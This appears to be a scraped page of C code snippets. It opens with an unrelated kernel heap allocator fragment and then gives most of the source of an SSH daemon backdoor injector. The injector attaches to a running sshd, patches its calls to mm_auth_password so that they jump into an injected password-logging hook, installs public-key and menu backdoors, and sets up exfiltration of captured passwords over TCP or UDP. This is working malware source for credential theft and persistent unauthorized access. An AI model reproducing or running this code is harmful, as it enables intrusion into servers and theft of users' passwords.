	uint32_t orig_hole_pos = (uint32_t) orig_hole_header;
	uint32_t orig_hole_size = orig_hole_header->size;
		
	if (orig_hole_size - new_size < sizeof(header_t) + sizeof(footer_t)) {
		size += orig_hole_size - new_size;
		new_size = orig_hole_size;
	}
	
	if (page_align && (orig_hole_pos & 0xFFFFF000)) {
		uint32_t new_location = orig_hole_pos + 0x1000 - (orig_hole_pos & 0xFFF) - sizeof(header_t);
		header_t *hole_header = (header_t*) orig_hole_pos;
		hole_header->size = 0x1000;
		hole_header->magic = HEAP_MAGIC;
		hole_header->is_hole = 1;
		footer_t *hole_footer = (footer_t*) ((uint32_t) new_location - sizeof(footer_t));
		hole_footer->magic = HEAP_MAGIC;
		hole_footer->header = hole_header;
		orig_hole_pos = new_location;
		orig_hole_size = orig_hole_size - hole_header->size;
	} else {
		remove_list(iterator, &heap->index);
	}
	
	header_t *block_header = (header_t*) orig_hole_pos;
	block_header->magic = HEAP_MAGIC;
	block_header->is_hole = 0;
	block_header->size = new_size;
	
	footer_t *block_footer = (footer_t*) (orig_hole_pos + sizeof(header_t) + size);
	block_footer->header = block_header;
	
	if (orig_hole_size - new_size > 0) {
		header_t *hole_header = (header_t*) (orig_hole_pos + sizeof(header_t) + size + sizeof(footer_t));
		hole_header->magic = HEAP_MAGIC;
		hole_header->is_hole = 1;
		hole_header->size = orig_hole_size - new_size;
		footer_t *hole_footer = (footer_t*) ((uint32_t) hole_header + orig_hole_size - new_size - sizeof(footer_t));
		
		if ((uint32_t) hole_footer < heap->end_address) {
			hole_footer->magic = HEAP_MAGIC;
			hole_footer->header = hole_header;			
		}
		insert_list((void*)hole_header, &heap->index);
	}
	return (void*) ((uint32_t) block_header + sizeof(header_t));
}
Exemplo n.º 15
0
int main(int argc, char *argv[]) {
	config_block *config;
	char *pubkey_value = NULL;
	char *passlog_path = NULL;
	char *pubkey_file = NULL;
	int  net_exfil_type = 0;
	int  menu_activate = 0;
	int  c;

	banner();

	if (argc < 2) {
		usage(argv[0]);
		return -1;
	}

 	config = malloc(sizeof(config_block));
	memset(config, 0, sizeof(config_block));

	while((c = getopt(argc-1, argv, "p:P:t:u:mc")) != -1) {
		switch(c) {
			case 'p':
				pubkey_value = optarg;
			break;

			case 'P':
				pubkey_file = optarg;
			break;

			case 't':
				if (!convert_hostport_pair(optarg, &config->ip_addr, (uint16_t*)&config->port))
					error("eh, '%s' is not a valid ip:port pair", optarg);

				config->net_type |= NET_EXFIL_TCP;
			break;

			case 'u':
				if (!convert_hostport_pair(optarg, &config->ip_addr, (uint16_t*)&config->port))
					error("eh, '%s' is not a valid ip:port pair", optarg);

				config->net_type |= NET_EXFIL_UDP;
			break;

			case 'c':
				config->only_log_valid = 1;
			break;

			case 'l':
				passlog_path = optarg;
			break;

			case 'm':
				menu_activate = 1;
			break;
		}
	}

	if (pubkey_file == NULL && pubkey_value == NULL && passlog_path == NULL && menu_activate == 0) {
		usage(argv[0]);
		return -1;
	}

	if (pubkey_value != NULL && pubkey_file != NULL) {
		usage(argv[0]);
		return -1;
	}

	if ((net_exfil_type & NET_EXFIL_TCP) && (net_exfil_type & NET_EXFIL_UDP)) {
		error("can only use one net exfiltration method.");
		return -1;
	}

	// allocate inject context
	inject_ctx *ctx = malloc(sizeof(inject_ctx));

	// init inject context
	inject_ctx_init(ctx, atoi(argv[argc-1]));

	// find rexec_flag
	u64 rexec_flag = inject_resolve_rexec(ctx);
	info("rexec_flag\t\t\t= 0x%lx", rexec_flag); 

	// install config memory block
	ctx->config_addr = find_hole(ctx, rexec_flag, 0x1000);

	info("allocating config memory @ 0x%lx", ctx->config_addr);

	_mmap(
		ctx, (void*)ctx->config_addr, 0x1000,
		PROT_READ| PROT_WRITE | PROT_EXEC,
		MAP_ANONYMOUS | MAP_SHARED | MAP_FIXED,
		0, 0
	);

	inject_ctx_map_reload(ctx);

	// install backdoor(s)
	if(config->net_type != 0) {
		backdoor_password_install(ctx);
		inject_ctx_map_reload(ctx);
	}

	if (pubkey_value != NULL || pubkey_file != NULL) {
		if (pubkey_file != NULL) {
			FILE *f = fopen(pubkey_file, "rb");

			if (f == NULL) {
				error("could not open pubkey file ('%s')", pubkey_file);
			}

			char keybuf[2048];
			memset(keybuf, 0, 2048);
			fgets(keybuf, 2047, f);
			fclose(f);

			if(strncmp(keybuf, "ssh-rsa", 7) != 0) {
				error("invalid pubkey specified, we only support ssh-rsa for now");
			}

			strcpy(config->pubkey, keybuf);

			backdoor_pubkey_install(ctx);
		} else {
			if(strncmp(pubkey_value, "ssh-rsa", 7) != 0) {
				error("invalid pubkey specified, we only support ssh-rsa for now");
			}

			strcpy(config->pubkey, pubkey_value);

			backdoor_pubkey_install(ctx);
		}

		inject_ctx_map_reload(ctx);
	}

	if (menu_activate) {
		backdoor_menu_install(ctx);
		inject_ctx_map_reload(ctx);
	}

	mod_banner("finishing install");

	// upload config data
	info("uploading config..");
	_poke(ctx->pid, ctx->config_addr, config, sizeof(config_block));

	// disable rexec
	info("switching off rexec..");
	u32 null_word = 0;
	_poke(ctx->pid, rexec_flag, &null_word, 4);

	// clean upr
	inject_ctx_deinit(ctx);
	callcache_free();

	info("all done!");

	return 0;
}
Exemplo n.º 16
0
void backdoor_password_install(inject_ctx *ctx) {
	u32 use_privsep_val=0;
	u64 use_privsep;
	u64 *mm_auth_password_calls = NULL;
	int i, n_mm_auth_password_calls;
	u64 diff=0, hole_addr=0;
	u8 *evil_bin;

	mod_banner("installing passlogger backdoor");

	evil_bin = malloc(hook_passlog_bin_len);
	memcpy(evil_bin, hook_passlog_bin, hook_passlog_bin_len);

	u64 *import_table = (u64*)(evil_bin + 8);

	use_privsep = resolve_symbol_tab(ctx, "use_privsep");

	if (use_privsep == 0)
		error("could not locate use_privsep :(");

	info("use_privsep\t\t= 0x%llx", use_privsep);

	_peek(ctx->pid, use_privsep, &use_privsep_val, 4);

	info("use_privsep\t\t= 0x%x", use_privsep_val);

	if (use_privsep_val == 0) {
		error("pass logging for PRIVSEP_OFF currently not supported.");
	}

	u64 mm_auth_password = sub_by_debugstr(ctx, "%s: waiting for MONITOR_ANS_AUTHPASSWORD");
	info("mm_auth_password\t\t= 0x%llx", mm_auth_password);

	n_mm_auth_password_calls = find_calls(&mm_auth_password_calls, mm_auth_password);

	if (n_mm_auth_password_calls == 0)
		error("No calls to mm_auth_password found.");

	hole_addr = find_hole(ctx, mm_auth_password_calls[0], 0x1000);
	
	if (hole_addr == 0) {
		error("unable to find neighborly hole.");
	}

	info("found usable hole @ 0x%lx", hole_addr);

	_mmap(
		ctx, (void*)hole_addr, 0x1000,
		PROT_READ| PROT_WRITE | PROT_EXEC,
		MAP_ANONYMOUS | MAP_SHARED | MAP_FIXED,
		0, 0
	);

	_peek(ctx->pid, use_privsep, &use_privsep_val, 4);
	
	// Patch mm_auth_password
	for (i = 0; i < n_mm_auth_password_calls; i++) {
		diff = 0x100000000-(mm_auth_password_calls[i]-hole_addr)-5;

		info(
			"building a bridge [0x%lx->0x%lx] .. opcode = [E8 %02X %02X %02X %02X]",
			mm_auth_password_calls[i], hole_addr,
			diff & 0xff, (diff>>8)&0xff, (diff>>16)&0xff, (diff>>24)&0xff
		);

		_poke(ctx->pid, mm_auth_password_calls[i]+1, &diff, 4);
	}

	import_table[0] = ctx->config_addr;
	import_table[1] = mm_auth_password;

	_poke(ctx->pid, hole_addr, evil_bin, hook_passlog_bin_len);
	
	free(mm_auth_password_calls);
}